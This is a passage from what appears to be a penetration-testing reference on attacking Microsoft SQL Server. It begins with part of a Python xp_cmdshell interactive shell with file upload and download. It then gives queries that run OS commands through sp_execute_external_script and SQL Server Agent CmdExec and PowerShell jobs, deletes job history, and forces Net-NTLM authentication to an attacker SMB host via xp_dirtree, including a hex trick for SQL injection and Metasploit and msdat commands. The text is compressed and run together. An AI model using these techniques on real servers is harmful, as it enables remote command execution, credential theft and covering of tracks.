mssql.close()returnelif cmd[0:6]=="UPLOAD": upload_cmd = shlex.split(cmd, posix=False)iflen(upload_cmd)<3:upload(mssql, stored_cwd, upload_cmd[1], stored_cwd+"\\"+upload_cmd[1])else:upload(mssql, stored_cwd, upload_cmd[1], upload_cmd[2]) cmd ="echo *** UPLOAD PROCEDURE FINISHED ***"elif cmd[0:8]=="DOWNLOAD": dowload_cmd = shlex.split(cmd, posix=False)iflen(dowload_cmd)<3: cmd =dowload(mssql, stored_cwd, dowload_cmd[1])else: cmd =dowload(mssql, stored_cwd, dowload_cmd[1], dowload_cmd[2]) mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'") (username, computername, cwd) =process_result(mssql) stored_cwd = cwdexcept _mssql.MssqlDatabaseException as e:if e.severity <=16:print("MSSQL failed: "+str(e))else:raisefinally:if mssql: mssql.close()shell()sys.exit()
sp_execute_external_script procedure
Introduced in SQL Server 2016 (13.x) and Azure SQL Managed Instance, the sp_execute_external_script procedure can be used to execute scripts written in a number of supported language (Python, R, or Java). The external scripts enabled option, off by default, must be set and the language supported by the server to allow external scripts execution of a given language.
In SQL Server 2016 (13.x), only the R language is supported. Starting from SQL Server 2017 (14.x), the installation of the Machine Learning Services feature may result in the activation of the external scripts enabled option and the support of the Python and / or R languages. Additionally, for SQL Server 2019 (15.x) and later, support for the Java language can be configured directly through the Machine Learning Services feature.
sp_execute_external_script activation and languages support
The following query can be used to manually activate the sp_execute_external_script procedure, given the account used has sufficient privilege:
-- Returns 1 if the "external scripts enabled" option is enabled.EXECUTE sp_configure 'external scripts enabled'-- Enables the "external scripts enabled" option.EXEC sp_configure 'external scripts enabled', 1;GORECONFIGURE WITH OVERRIDE;GO
The following queries can be used to test whether the Python / R languages are supported:
-- Source : https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/external-scripts-enabled-server-configuration-option?view=sql-server-ver15-- Returns "supported 1" if the `Python` language is supported.EXEC sp_execute_external_script @language =N'Python',@script=N'OutputDataSet = InputDataSet;',@input_data_1 =N'SELECT 1 AS supported'WITH RESULT SETS (([hello] intnot null));GO-- Returns "supported 1" if the `Python` language is supported.EXEC sp_execute_external_script @language =N'R',@script=N'OutputDataSet <- InputDataSet;',@input_data_1 =N'SELECT 1 AS supported'WITH RESULT SETS (([hello] intnot null));GO
Operating System commands execution through sp_execute_external_script
If the prerequisites are satisfied, script of any supported language can be executed using the sp_execute_external_script procedure:
-- sp_execute_external_script procedure basic usage.EXEC sp_execute_external_script @language =N'<Python | R | LANGUAGE>', @script =N'<SCRIPT>'GO-- Example call to sp_execute_external_script to execute OS command with output using Python.EXEC sp_execute_external_script @language =N'Python' , @script = N'import subprocess;a = subprocess.check_output(["<OS_COMMAND>"], shell=True).decode();print(a);'GO
SQL Server Agent
Overview
The SQL Server Agent is a Windows service that executes scheduled tasks, denominated SQL Server Agent jobs. SQL Server Agent is available is all versions of SQL server, except SQL Server Express, but is disabled by default.
In order to fulfil its function, the SQL Server Agent Windows service must be run using an account having the sysadmin fixed server role in SQL Server as well as the following Windows privileges: SeServiceLogonRight, SeAssignPrimaryTokenPrivilege, SeChangeNotifyPrivilege, and SeIncreaseQuotaPrivilege.
The SQL Server Agent jobs can be executed:
through a SQL Agent schedule, for example at a recurring interval or at a specific timestamp. A job can be associated with multiple schedules, and reciprocally, a schedule can dictate the execution of multiple jobs.
upon the triggering of a SQL Agent alert, for example in response to an event such as another job execution or the reaching of a system resources usage threshold.
directly by executing the sp_start_job stored procedure.
A SQL Server Agent job is composed of (at least) one or multiple steps, each step being assigned to a specific SQL Server Agent subsystem. It is possible to execute operating system commands using the following subsystems:
CmdExec: run an executable with the specified command line option, such as cmd.exe /c <COMMAND> for example.
PowerShell: run a PowerShell script, by specifying either the PowerShell code directly or a PowerShell script file.
ActiveX: run an ActiveX script. Note that the ActiveSscripting subsystem is discontinued since SQL Server 2016 (included).
Note that a SQL Server Agent job can run locally on the SQL Server they are configured as well as on one or multiple remote servers.
The permissions to configure, execute, and delete SQL Server Agent jobs are governed by the following fixed database roles:
Role
Scope
Notable associated permissions
sysadmin
Fixed-server role.
Can administrate and execute any jobs, regardless of the job's owner.
Is the only role that can define new proxy accounts.
Additionally, can define and execute jobs that will run as the SQL Server Agent Windows service account.
By default, only the members of the sysadmin fixed server role can setup a multi-servers environment.
SQLAgentUserRole
msdb database fixed-database role.
Can create and execute local jobs under their own security context or using the identity of an existing proxy account.
Can enumerate, modify, or delete jobs they own.
By default, cannot delete the job history of the jobs they own.
Cannot enumerate, administrate, or execute jobs they don't own.
SQLAgentReaderRole
msdb database fixed-database role.
Includes the permissions of the SQLAgentUserRole role.
Can additionally enumerate and view the properties / history of all local or multi-servers jobs.
SQLAgentOperatorRole
msdb database fixed-database role.
Includes the permissions of the SQLAgentUserRole and SQLAgentReaderRole roles.
Can additionally execute, stop, and enable / disable all local jobs and their job history.
Cannot however modify or delete jobs they don't own (nor make use of multi-servers jobs).
SQL Server Agent jobs prerequisites
In order to execute SQL Server Agent jobs:
the SQL Server Agent Windows service must be running.
the current user must have sufficient privileges (fixed-server sysadmin role or any of the fixed-database roles introduced above).
# Checks whether the SQL Server Agent Windows service is running or not.
SELECT dss.[status], dss.[status_desc] FROM sys.dm_server_services dss WHERE dss.[servicename] LIKE N'SQL Server Agent (%';
# Checks if the current, or specified, user has the fixed-server sysadmin role.
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT IS_SRVROLEMEMBER('sysadmin', '<USERNAME>')
# Lists the each users msdb database's roles (including the SQLAgentUserRole, SQLAgentReaderRole, SQLAgentOperatorRole roles related to SQL Server Agent jobs).
SELECT u.name, r.name FROM msdb.sys.database_role_members AS m INNER JOIN msdb.sys.database_principals AS r ON m.role_principal_id = r.principal_id INNER JOIN msdb.sys.database_principals AS u ON u.principal_id = m.member_principal_id;
USE MSDB; EXEC sp_helprolemember 'SQLAgentUserRole';
USE MSDB; EXEC sp_helprolemember 'SQLAgentReaderRole';
USE MSDB; EXEC sp_helprolemember 'SQLAgentOperatorRole';
SQL Server Agent jobs operations
The following SQL statements can be used to enumerate, create or delete SQL Server Agent jobs:
-- Retrieves information about the currently defined SQL Server Agent jobs.SELECT job_id, name, enabled, description, originating_server_id, start_step_id, owner_sid, date_created, date_modified FROM msdb.dbo.sysjobs;-- Enumerates all, or the specified, SQL Server Agent jobs' steps.SELECT * FROM msdb.dbo.sysjobsteps;SELECT * FROM msdb.dbo.sysjobsteps WHERE job_id =N'<JOBS_ID>';-- Retrieves information about all, or the specified, activity and status.SELECT * FROM msdb.dbo.sysjobactivity;SELECT * FROM msdb.dbo.sysjobactivity WHERE job_id =N'<JOBS_ID>';-- Enumerates the EXEC msdb.dbo.sp_help_proxEXEC msdb.dbo.sp_help_prox-- Retrieves information about past (all or the specified) SQL Server Agent jobs execution history.SELECT * FROM msdb.dbo.sysjobhistory;SELECT * FROM msdb.dbo.sysjobhistory WHERE job_id =N'<JOBS_ID>';-- Deletes the specified SQL Server Agent jobs.EXEC msdb.dbo.sp_delete_job @job_name =N'<JOBS_NAME>';EXEC msdb.dbo.sp_delete_job @job_id =N'<JOBS_ID>';-- Deletes SQL Server Agent jobs history.EXEC msdb.dbo.sp_purge_jobhistory @job_name =N'<JOBS_NAME>';EXEC msdb.dbo.sp_purge_jobhistory @job_id =N'<JOBS_ID>';-- Members of the sysadmin or SQLAgentOperatorRole roles can delete all local jobs history (and multiservers jobs history as well for sysadmin).EXEC msdb.dbo.sp_purge_jobhistory;-- Creates and runs a SQL Server Agent job with a single CmdExec / PowerShell step to execute an operating system command.EXEC msdb.dbo.sp_add_job @job_name =N'<JOBS_NAME>';-- A proxy can be specified using proxy_id (@proxy_id = <1 | PROXY_ID>) or proxy_name (@proxy_name = <PROXY_NAME>) to run the jobs step under the identity of another identity.EXEC msdb.dbo.sp_add_jobstep @job_name =N'<JOBS_NAME>', @step_name =N'<JOBS_STEP>', @subsystem =N'<CmdExec | PowerShell>', @command =N'<CMD_COMMAND | POWERSHELL_COMMAND>', @retry_attempts =<1 | RETRY_ATTEMPTS>, @retry_interval =<1 | RETRY_INTERVAL_IN_MINUTES>;-- The job will be executed on the local server by default. If necessary, the sp_add_jobserver procedure can be used to attach the job to a remote server (registered as a target server for the current instance).EXEC msdb.dbo.sp_add_jobserver @job_name =N'<JOBS_NAME>', @server_name =N'<LOCAL | SERVER_NAME>';EXEC msdb.dbo.sp_start_job N'<JOBS_NAME>'
Net-NTLM stealer and relaying
The (undocumented) xp_dirtree, xp_fileexist and xp_getfiledetails SQL stored procedures can be used to access files on remote systems over SMB. The account running the SQL service, be it a local or domain joined account, will authenticate to the SMB share by completing a Net-NTLMv1 or Net-NTLMv2 challenge.
This response can be offline cracked to retrieve the password of the SQL service account. The authentication challenge can also be relayed in order to directly execute commands as the account running the SQL service through the SMB service of a targeted server. The targeted server must expose a SMB service that does not require message signing and the SQL service account must have local administrator privileges on the server. For more information on how to conduct this attack, refer to the Active Directory - NTLM Relaying note.
Depending on the permissions configured to use the procedures, a non privileged user may be able to execute them. Usually, the account connecting to the database should only require the PUBLIC role to execute the procedures.
To capture the Net-NTLM response, a SMB share service or Responder must be started:
Then, from a connected SQL interpreter, the methods can be used to make a connection to the SMB service:
-- METHOD = xp_dirtree / xp_fileexist / xp_getfiledetails<METHOD>'\\<HOSTNAME | IP>\<WHATEVER_SHARE>';EXEC <METHOD>'\\<HOSTNAME | IP>\<WHATEVER_SHARE>';EXEC <METHOD>'\\<HOSTNAME | IP>\<WHATEVER_SHARE>',1,1;EXEC master.sys.<METHOD>'\\<HOSTNAME | IP>\<WHATEVER_SHARE>';EXEC master..<METHOD>'\\<HOSTNAME | IP>\<WHATEVER_SHARE>';EXEC master.dbo.<METHOD>'\\<HOSTNAME | IP>\<WHATEVER_SHARE>';# To bypass single quote issues in SQL injection, the following may be used.# Example: \\<IP>\<FAKE_SHARE>-> 0x5c5c3c49503e5c3c46414b455f53484152453e1;DECLARE @varshare VARCHAR(8000);SET @varshare=<0xHEX_ENCODED_PATH>;EXEC master.sys. <METHOD> @varshare--
The metasploit module auxiliary/admin/mssql/mssql_ntlm_stealer and the msdatPython script can be used to try the three methods above automatically:
# Only tries xp_dirtree and xp_fileexistmsf> useauxiliary/admin/mssql/mssql_ntlm_stealermsdatsmbauthcapture-v-s<RHOST>-p<RPORT>-D<DB_NAME>-U<USERNAME>-P'<PASSWORD>'--capture<LHOST_SMB_SERVER>